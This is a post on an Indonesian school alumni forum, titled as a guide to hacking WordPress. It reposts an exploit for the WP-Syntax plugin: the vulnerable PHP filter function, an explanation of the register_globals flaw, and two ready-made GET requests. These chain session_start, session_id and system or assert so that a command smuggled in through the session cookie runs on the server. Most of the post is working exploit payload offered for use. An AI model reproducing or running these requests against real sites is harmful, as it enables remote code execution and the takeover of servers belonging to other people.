FORUM SMP 1 WONOSARI

=> Ini adalah forum untuk murid-murid maupun alumni SMP 1 WONOSARI ! Yang mau mengenang atau berbagi cerita bisa di forum ini ! Ramein Yuk ! <=


    Cara Hack Wordpress - Gunakan WP-Syntax

    Share

    Admin
    Senior

    Jumlah posting : 81
    Reputation : 0
    Join date : 07.04.10
    Age : 20
    Lokasi : Gunungkidul

    Cara Hack Wordpress - Gunakan WP-Syntax

    Post by Admin on Sun 11 Apr 2010 - 4:12

    Code:
    titik kelamahan/bugs terdapat pada code test/index.php@132-150:

    ...
    function apply_filters($tag, $string)
    {
    global $test_filter;

    if (!isset($test_filter[$tag])) return $string;

    uksort($test_filter[$tag], "strnatcasecmp");

    foreach ($test_filter[$tag] as $priority => $functions)
    {
    if (is_null($functions)) continue;

    foreach($functions as $function)
    {
    $string = call_user_func_array($function, array($string));
    }
    }
    return $string;
    }
    ...

    Keterangan:
    Global variable test_filter is not defined, so register_globals = on
    makes it possible to pass arbitrary value into the first parameter of
    call_user_func_array(). Considering the fact that this function is
    called in a loop and the returned value is assinged to the second parameter
    on every iteration, it is obvious that user function can be called with
    a single parameter containing arbitrary data that can come from the
    environment, e.g. session id. There are several valid sequences of function
    calls that let execute any code.

    ==============================[1]=====================================
    GET /wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0
    Host: localhost
    Cookie: PHPSESSID=dir
    Connection: close

    Initially session_start() is called, then the return value of session_id() that
    contains command to execute passes to system().

    ==============================[2]=====================================
    /wp-content/index.php?test_filter[wp_head][99][]=session_start&test_filter[wp_head][99][0]=session_id&test_filter[wp_head][99][1]=base64_decode&test_filter[wp_head][99][2]=assert&q=phpinfo();exit;

    This vector was found by ShAnKaR and improves the previous one by using
    base64-encoded payload that broadens the char range that can be passed
    to the next function. Besides, assert() successfully executes arbitrary
    code being called in call_user_func_array() while the usage of eval() in
    this function is not possible.

      Waktu sekarang Fri 9 Dec 2016 - 10:19